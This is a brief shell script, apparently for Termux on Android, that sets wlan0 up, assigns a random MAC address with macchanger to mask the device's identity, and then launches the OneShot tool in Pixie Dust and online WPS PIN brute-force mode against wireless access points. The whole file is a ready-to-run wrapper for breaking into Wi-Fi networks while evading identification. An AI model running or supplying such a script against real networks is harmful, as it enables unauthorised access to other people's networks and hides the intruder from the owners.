#!sudo sh
# sets random MAC and runs OneShot in online bruteforce mode
# place this to {termux folder}/files/usr/bin/

iface="wlan0"
path="/data/data/com.termux/files/home/wps/OneShot"


ip link set $iface up
macchanger -r $iface | grep "New"

python3 $path/oneshot.py -i $iface -K -B -w
